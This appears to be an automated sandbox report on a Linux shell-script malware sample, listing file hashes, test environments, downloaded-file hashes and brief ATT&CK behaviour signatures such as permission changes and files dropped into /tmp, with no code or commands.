Analysis
-
max time kernel
39s -
max time network
131s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64 arch:i386 image:ubuntu1804-amd64-20240611-en kernel:4.15.0-213-generic locale:en-us os:ubuntu-18.04-amd64 system -
submitted
25/11/2024, 02:54
Static task
static1
Behavioral task
behavioral1
Sample
b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad.sh
-
Size
10KB
-
MD5
b643808c01faa0f92bf870288eb8dd16
-
SHA1
494306996b3ee0573b6da340ee334523cd39f9eb
-
SHA256
b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad
-
SHA512
f8e2bed091a7cf127f3feadc979a7ee81e9835a68b98f78afc737f354cdf3348e42f4551cc47d805e0734fd77e02963e665aad84c33c02e18395f86754ae24cb
-
SSDEEP
96:+Hb3G9hf3INVTX1G+Emzer6e0D7tAokHbrf3+PTX1G+1emzer6wN6W:+Hb3VvTX1G+EmzereTX1G+Mmzerx
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97